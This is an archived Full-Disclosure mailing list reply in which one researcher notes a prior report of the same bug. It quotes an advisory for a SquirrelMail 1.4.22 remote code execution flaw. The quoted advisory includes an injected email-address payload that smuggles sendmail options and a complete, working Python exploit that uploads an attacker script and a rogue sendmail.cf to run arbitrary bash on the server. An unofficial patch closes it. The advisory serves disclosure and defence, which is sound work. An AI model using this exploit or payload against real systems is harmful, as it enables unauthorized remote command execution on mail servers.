| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <CADSYzssDX_ELeN+tnSjyRv-93uFZczA1HopOVYaDwZqhqqn92w@mail.gmail.com>
Date: Wed, 19 Apr 2017 11:36:58 -0300
From: Dawid Golunski <dawid@...alhackers.com>
To: Filippo Cavallarin <filippo.cavallarin@...resegment.com>
Cc: fulldisclosure@...lists.org, bugtraq@...urityfocus.com
Subject: Re: [FD] CVE-2017-7692: Squirrelmail 1.4.22 Remote Code Execution
Hi Filippo,
I actually reported this vulnerability to the vendor at the beginning
of this year. I also got the following CVEID assigned for it in
January: CVE-2017-5181.
I was waiting on the vendor to patch the vulnerability since then
before I publish the details.
Has he got back to you?
On Wed, Apr 19, 2017 at 10:07 AM, Filippo Cavallarin
<filippo.cavallarin@...resegment.com> wrote:
> Advisory ID: SGMA17-001
> Title: Squirrelmail Remote Code Execution
> Product: Squirrelmail
> Version: 1.4.22 and probably prior
> Vendor: squirrelmail.org
> Type: Command Injection
> Risk level: 4 / 5
> Credit: filippo.cavallarin@...resegment.com
> CVE: CVE-2017-7692
> Vendor notification: 2017-04-04
> Vendor fix: N/A
> Public disclosure: 2017-04-19
>
>
>
>
> DETAILS
>
> Squirrelmail version 1.4.22 (and probably prior) is vulnerable to a remote code execution vulnerability because
> it fails to sanitize a string before passing it to a popen call. It's possible to exploit this vulnerability to
> execute arbitrary shell commands on the remote server.
>
> The problem is in Deliver_SendMail.class.php on initStream function that uses escapeshellcmd() to sanitize the
> sendmail command before executing it. The use of escapeshellcmd() is not correct in this case since it don't
> escapes whitespaces allowing the injection of arbitrary command parameters.
>
> $this->sendmail_command = "$sendmail_path $this->sendmail_args -f$envelopefrom";
> $stream = popen(escapeshellcmd($this->sendmail_command), "w");
>
>
> The $envelopefrom variable is controlled by the attacker, hence it's possible to trick sendmail to use an
> attacker-provided configuration file that triggers the execution of an arbitrary command.
>
> In order to exploit this vulnerability the MTA in use must be sendmail and Squirrelmail must be configured
> to use it as commandline (useSendmail directive of the config file set to true).
> Also, the edit_identity directive of the config file must be bet to true, but this is the default configuration.
>
> To reproduce the issue follow these steps:
> 1. Create a rogue sendmail.cf that triggers the execution of a /usr/bin/touch:
> [...]
> Mlocal, P=/usr/bin/touch, F=lsDFMAw5:/|@...9S, S=EnvFromL/HdrFromL, R=EnvToL/HdrToL,
> T=DNS/RFC822/X-Unix,
> A=X /tmp/executed
> 2. Upload it as a mail attachment and get it's remote name (ex: lF51mGPJwdqzV3LEDlCdSVNpohzgF7sD)
> 3. Go to Options -> Personal Informations and set the following payload as Email Address:
> <aaa@....com -OQueueDirectory=/tmp -C /var/local/squirrelmail/attach/lF51mGPJwdqzV3LEDlCdSVNpohzgF7sD>
> 4. Send an email
> 5. Verify the execution of the command with "ls /tmp/executed" on the remote server
>
>
>
>
> PROOF OF CONCEPT
>
> The followig python script exploits this vulnerability to execute an attacker provided bash script on the remote server.
>
> BOF
> #!/usr/bin/env python
> # -*- coding: utf-8 -*-
>
> """
>
> SquirrelMail 1.4.22 Remote Code Execution (authenticated)
> Exploit code for CVE-2017-7692
> filippo.cavallarin@...resegment.com
>
> """
>
> from __future__ import unicode_literals
> import sys
> import os
> import re
> import requests
>
> reload(sys)
> sys.setdefaultencoding('utf8')
>
>
> SENDMAILCF="/tmp/squirrelmail1_4_22-sendmailcf-rce"
> COMPOSE = "/src/compose.php"
> INFOS = "/src/options.php?optpage=personal"
> SQM_ATTACH_PATH = "/var/local/squirrelmail/attach/"
> # must be enclosed in <> otherwise spaces will be removed ..
> SENDER = "<px@...x.com -OQueueDirectory=/tmp -C %s%s>"
>
>
> SESSID = ""
> BASEURL = ""
>
>
> def attach(attachment):
> url = "%s%s" % (BASEURL, COMPOSE)
> token = get_csrf_token(url)
>
> values = {
> "smtoken": token,
> "attach": "add"
> }
>
> try:
> files = {'attachfile': open(attachment,'rb')}
> resp = requests.post(url, files=files, data=values, cookies={'SQMSESSID':SESSID})
> fname = re.search(r'att_local_name";s:[0-9]+:"([a-zA-Z0-9]+)"', resp.text)
> if not fname:
> print "\nError: unable to upload file %s" % attachment
> return fname.group(1)
>
> except Exception as e:
> print "\nError: %s" % e
> sys.exit(1)
>
>
> def send():
> url = "%s%s" % (BASEURL, COMPOSE)
> token = get_csrf_token(url)
>
> values = {
> "smtoken": token,
> "send_to": "root",
> "send": "Send"
> }
>
> try:
> resp = requests.post(url, data=values, cookies={'SQMSESSID':SESSID})
> except Exception as e:
> print "\nError: %s" % e
> sys.exit(1)
>
>
> def set_identity(sender):
> url = "%s%s" % (BASEURL, INFOS)
> token = get_csrf_token(url)
> values = {
> "smtoken": token,
> "optpage": "personal",
> "optmode": "submit",
> "new_email_address": sender,
> "submit_personal": "Submit"
> }
>
> try:
> requests.post(url, data=values, cookies={'SQMSESSID':SESSID})
> except Exception as e:
> print "\nError: %s" % e
> sys.exit(1)
>
>
> def get_csrf_token(url):
> try:
> body = requests.get(url, cookies={'SQMSESSID':SESSID}).text
> inp = re.search(r'<input.*name="smtoken".*>', body, re.MULTILINE)
> token = re.search(r'value="([a-zA-Z0-9]+)"', inp.group(0))
> if token:
> return token.group(1)
> except Exception as e:
> pass
>
> print "\nUnable to get CSRF token"
> sys.exit(1)
>
> def outw(s):
> sys.stdout.write(s)
> sys.stdout.flush()
>
> def main(argv):
> global BASEURL
> global SESSID
>
> if len(argv) != 4:
> print (
> "SquirrelMail 1.4.22 Remote Code Execution (authenticated) - filippo.cavallarin@...resegment.com\n"
> "The target server must use sendmail and squirrelmail must be configured to use /usr/bin/sendmail\n"
> "Usage:\n"
> " %s <url> <session_id> <script>\n"
> " url: the url of squirrelmail\n"
> " session_id: the value of SQMSESSID cookie\n"
> " script: the path to the bash script to be executed on the target\n"
> "Example:\n"
> " %s http:/example.com/squirrelmail/ l2rapvcovsui1on0b4i5boev24 reverseshell.sh"
> ) % (argv[0], argv[0])
>
> sys.exit(1)
>
> BASEURL = argv[1]
> SESSID = argv[2]
> script = argv[3]
>
> outw("Uploading script ... ")
> script_fname = attach(script)
> print "ok"
>
>
> outw("Generating sendmail.cf ... ")
> try:
> script_path = "%s%s" % (SQM_ATTACH_PATH, script_fname)
> with open(SENDMAILCF, 'w') as f:
> f.write(SENDMAILCF_CONTENT % script_path)
> except Exception as e:
> print "\nError: %s" % e
> sys.exit(1)
> print "ok"
>
> outw("Uploading sendmail.cf ... ")
> smc_fname = attach(SENDMAILCF)
> os.remove(SENDMAILCF)
> print "ok"
>
> outw("Updating user options ... ")
> sender = SENDER % (SQM_ATTACH_PATH, smc_fname)
> set_identity(sender)
> print "ok"
>
> outw("Checking identity field ... ")
> icheck = requests.get("%s%s" % (BASEURL, INFOS), cookies={'SQMSESSID':SESSID}).text
> if not smc_fname in icheck:
> print "\nError: unable to set identity field .. maybe squirrelmail is configured with edit_identity=false"
> sys.exit(1)
> print "ok"
>
> outw("Executing script ... ")
> send()
> print "ok\n"
> sys.exit(0)
>
> SENDMAILCF_CONTENT = """
> O DontBlameSendmail=,AssumeSafeChown,ForwardFileInGroupWritableDirPath,GroupWritableForwardFileSafe,GroupWritableIncludeFileSafe,IncludeFileInGroupWritableDirPath,DontWarnForwardFileInUnsafeDirPath,TrustStickyBit,NonRootSafeAddr,GroupWritableIncludeFile,GroupReadableDefaultAuthInfoFile
> Kdequote dequote
> Scanonify=3
> R$@ $@ <@>
> R$* $: $1 <@> mark addresses
> R$* < $* > $* <@> $: $1 < $2 > $3 unmark <addr>
> R@ $* <@> $: @ $1 unmark @host:...
> R$* [ IPv6 : $+ ] <@> $: $1 [ IPv6 : $2 ] unmark IPv6 addr
> R$* :: $* <@> $: $1 :: $2 unmark node::addr
> R:include: $* <@> $: :include: $1 unmark :include:...
> R$* : $* [ $* ] $: $1 : $2 [ $3 ] <@> remark if leading colon
> R$* : $* <@> $: $2 strip colon if marked
> R$* <@> $: $1 unmark
> R$* ; $1 strip trailing semi
> R$* < $+ :; > $* $@ $2 :; <@> catch <list:;>
> R$* < $* ; > $1 < $2 > bogus bracketed semi
> R$@ $@ :; <@>
> R$* $: < $1 > housekeeping <>
> R$+ < $* > < $2 > strip excess on left
> R< $* > $+ < $1 > strip excess on right
> R<> $@ < @ > MAIL FROM:<> case
> R< $+ > $: $1 remove housekeeping <>
> R@ $+ , $+ $2
> R@ [ $* ] : $+ $2
> R@ $+ : $+ $2
> R $+ : $* ; @ $+ $@ $>Canonify2 $1 : $2 ; < @ $3 > list syntax
> R $+ : $* ; $@ $1 : $2; list syntax
> R$+ @ $+ $: $1 < @ $2 > focus on domain
> R$+ < $+ @ $+ > $1 $2 < @ $3 > move gaze right
> R$+ < @ $+ > $@ $>Canonify2 $1 < @ $2 > already canonical
> R$- ! $+ $@ $>Canonify2 $2 < @ $1 .UUCP > resolve uucp names
> R$+ . $- ! $+ $@ $>Canonify2 $3 < @ $1 . $2 > domain uucps
> R$+ ! $+ $@ $>Canonify2 $2 < @ $1 .UUCP > uucp subdomains
> R$* %% $* $1 @ $2 First make them all @s.
> R$* @ $* @ $* $1 %% $2 @ $3 Undo all but the last.
> R$* @ $* $@ $>Canonify2 $1 < @ $2 > Insert < > and finish
> R$* $@ $>Canonify2 $1
> SCanonify2=96
> R$* < @ localhost > $* $: $1 < @ $j . > $2 no domain at all
> R$* < @ localhost . $m > $* $: $1 < @ $j . > $2 local domain
> R$* < @ localhost . UUCP > $* $: $1 < @ $j . > $2 .UUCP domain
> R$* < @ [ $+ ] > $* $: $1 < @@ [ $2 ] > $3 mark [addr]
> R$* < @@ $=w > $* $: $1 < @ $j . > $3 self-literal
> R$* < @@ $+ > $* $@ $1 < @ $2 > $3 canon IP addr
> Sfinal=4
> R$+ :; <@> $@ $1 : handle <list:;>
> R$* <@> $@ handle <> and list:;
> R$* < @ $+ . > $* $1 < @ $2 > $3
> R$* < @ *LOCAL* > $* $1 < @ $j > $2
> R$* < $+ > $* $1 $2 $3 defocus
> R@ $+ : @ $+ : $+ @ $1 , @ $2 : $3 <route-addr> canonical
> R@ $* $@ @ $1 ... and exit
> R$+ @ $- . UUCP $2!$1 u@...UCP => h!u
> R$+ %% $=w @ $=w $1 @ $2 u%%host@...t => u@...t
> SRecurse=97
> R$* $: $>canonify $1
> R$* $@ $>parse $1
> Sparse=0
> R$* $: $>Parse0 $1 initial parsing
> R<@> $#local $: <@> special case error msgs
> R$* $: $>ParseLocal $1 handle local hacks
> R$* $: $>Parse1 $1 final parsing
> SParse0
> R<@> $@ <@> special case error msgs
> R$* : $* ; <@> $#error $@ 5.1.3 $: "553 List:; syntax illegal for recipient addresses"
> R@ <@ $* > < @ $1 > catch "@@host" bogosity
> R<@ $+> $#error $@ 5.1.3 $: "553 User address required"
> R$+ <@> $#error $@ 5.1.3 $: "553 Hostname required"
> R$* $: <> $1
> R<> $* < @ [ $* ] : $+ > $* $1 < @ [ $2 ] : $3 > $4
> R<> $* < @ [ $* ] , $+ > $* $1 < @ [ $2 ] , $3 > $4
> R<> $* < @ [ $* ] $+ > $* $#error $@ 5.1.2 $: "553 Invalid address"
> R<> $* < @ [ $+ ] > $* $1 < @ [ $2 ] > $3
> R<> $* <$* : $* > $* $#error $@ 5.1.3 $: "553 Colon illegal in host name part"
> R<> $* $1
> R$* < @ . $* > $* $#error $@ 5.1.2 $: "553 Invalid host name"
> R$* < @ $* .. $* > $* $#error $@ 5.1.2 $: "553 Invalid host name"
> R$* < @ $* @ > $* $#error $@ 5.1.2 $: "553 Invalid route address"
> R$* @ $* < @ $* > $* $#error $@ 5.1.3 $: "553 Invalid route address"
> R$* , $~O $* $#error $@ 5.1.3 $: "553 Invalid route address"
> R$* < @ > $* $@ $>Parse0 $>canonify $1 user@ => user
> R< @ $=w . > : $* $@ $>Parse0 $>canonify $2 @here:... -> ...
> R$- < @ $=w . > $: $(dequote $1 $) < @ $2 . > dequote "foo"@here
> R< @ $+ > $#error $@ 5.1.3 $: "553 User address required"
> R$* $=O $* < @ $=w . > $@ $>Parse0 $>canonify $1 $2 $3 ...@...e -> ...
> R$- $: $(dequote $1 $) < @ *LOCAL* > dequote "foo"
> R< @ *LOCAL* > $#error $@ 5.1.3 $: "553 User address required"
> R$* $=O $* < @ *LOCAL* >
> $@ $>Parse0 $>canonify $1 $2 $3 ...@...CAL* -> ...
> R$* < @ *LOCAL* > $: $1
> SParse1
> R$* < @ [ $+ ] > $* $: $>ParseLocal $1 < @ [ $2 ] > $3 numeric internet spec
> R$* < @ [ $+ ] > $* $: $1 < @ [ $2 ] : $S > $3 Add smart host to path
> R$* < @ [ $+ ] : > $* $#esmtp $@ [$2] $: $1 < @ [$2] > $3 no smarthost: send
> R$* < @ [ $+ ] : $- : $*> $* $#$3 $@ $4 $: $1 < @ [$2] > $5 smarthost with mailer
> R$* < @ [ $+ ] : $+ > $* $#esmtp $@ $3 $: $1 < @ [$2] > $4 smarthost without mailer
> R$=L < @ $=w . > $#local $: @ $1 special local names
> R$+ < @ $=w . > $#local $: $1 regular local name
> R$* < @ $* > $* $: $>MailerToTriple < $S > $1 < @ $2 > $3 glue on smarthost name
> R$* < @$* > $* $#esmtp $@ $2 $: $1 < @ $2 > $3 user@...t.domain
> R$=L $#local $: @ $1 special local names
> R$+ $#local $: $1 regular local names
> SLocal_localaddr
> Slocaladdr=5
> R$+ $: $1 $| $>"Local_localaddr" $1
> R$+ $| $#ok $@ $1 no change
> R$+ $| $#$* $#$2
> R$+ $| $* $: $1
> R$+ + * $#local $@ $&h $: $1
> R$+ + $* $#local $@ + $2 $: $1 + *
> R$+ $: <> $1
> R< > $+ $: < > < $1 <> $&h > nope, restore +detail
> R< > < $+ <> + $* > $: < > < $1 + $2 > check whether +detail
> R< > < $+ <> $* > $: < > < $1 > else discard
> R< > < $+ + $* > $* < > < $1 > + $2 $3 find the user part
> R< > < $+ > + $* $#local $@ $2 $: @ $1 strip the extra +
> R< > < $+ > $@ $1 no +detail
> R$+ $: $1 <> $&h add +detail back in
> R$+ <> + $* $: $1 + $2 check whether +detail
> R$+ <> $* $: $1 else discard
> R< local : $* > $* $: $>MailerToTriple < local : $1 > $2 no host extension
> R< error : $* > $* $: $>MailerToTriple < error : $1 > $2 no host extension
> R< $~[ : $+ > $+ $: $>MailerToTriple < $1 : $2 > $3 < @ $2 >
> R< $+ > $+ $@ $>MailerToTriple < $1 > $2 < @ $1 >
> SParseLocal=98
> SEnvFromL
> R<@> $n errors to mailer-daemon
> R@ <@ $*> $n temporarily bypass Sun bogosity
> R$+ $: $>AddDomain $1 add local domain if needed
> R$* $: $>MasqEnv $1 do masquerading
> SEnvToL
> R$+ < @ $* > $: $1 strip host part
> R$+ + $* $: < $&{addr_type} > $1 + $2 mark with addr type
> R<e s> $+ + $* $: $1 remove +detail for sender
> R< $* > $+ $: $2 else remove mark
> SHdrFromL
> R<@> $n errors to mailer-daemon
> R@ <@ $*> $n temporarily bypass Sun bogosity
> R$+ $: $>AddDomain $1 add local domain if needed
> R$* $: $>MasqHdr $1 do masquerading
> SHdrToL
> R$+ $: $>AddDomain $1 add local domain if needed
> R$* $: $>MasqHdr $1 do all-masquerading
> SAddDomain
> R$* < @ $* > $* $@ $1 < @ $2 > $3 already fully qualified
> R$+ $@ $1 < @ *LOCAL* > add local qualification
> Mlocal, P=/bin/bash, F=lsDFMAw5:/|@...9S, S=EnvFromL/HdrFromL, R=EnvToL/HdrToL,
> T=DNS/RFC822/X-Unix,
> A=X %s
> Mprog, P=/bin/sh, F=lsDFMoqeu9, S=EnvFromL/HdrFromL, R=EnvToL/HdrToL, D=$z:/,
> T=X-Unix/X-Unix/X-Unix,
> A=sh -c $u
>
> """
>
> if __name__ == '__main__':
> main(sys.argv)
>
> EOF
>
>
>
>
> SOLUTION
>
> Since the vendor did not respond to our mails, no official fix is available.
> However, the following unofficial patch can be used to fix this vulnerability.
>
> BOF
> diff -ruN squirrelmail-webmail-1.4.22/class/deliver/Deliver_SendMail.class.php squirrelmail-webmail-1.4.22-fix-CVE-2017-7692/class/deliver/Deliver_SendMail.class.php
> --- squirrelmail-webmail-1.4.22/class/deliver/Deliver_SendMail.class.php 2011-01-06 02:44:03.000000000 +0000
> +++ squirrelmail-webmail-1.4.22-fix-CVE-2017-7692/class/deliver/Deliver_SendMail.class.php 2017-04-18 11:42:26.505181944 +0000
> @@ -93,9 +93,9 @@
> $envelopefrom = trim($from->mailbox.'@...from->host);
> $envelopefrom = str_replace(array("\0","\n"),array('',''),$envelopefrom);
> // save executed command for future reference
> - $this->sendmail_command = "$sendmail_path $this->sendmail_args -f$envelopefrom";
> + $this->sendmail_command = escapeshellcmd("$sendmail_path $this->sendmail_args -f") . escapeshellarg($envelopefrom);
> // open process handle for writing
> - $stream = popen(escapeshellcmd($this->sendmail_command), "w");
> + $stream = popen($this->sendmail_command, "w");
> return $stream;
> }
> EOF
>
>
>
>
> REFERENCES
>
> https://squirrelmail.org/
> https://www.wearesegment.com/research/Squirrelmail-Remote-Code-Execution.html
>
>
--
Regards,
Dawid Golunski
https://legalhackers.com
t: @dawid_golunski
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists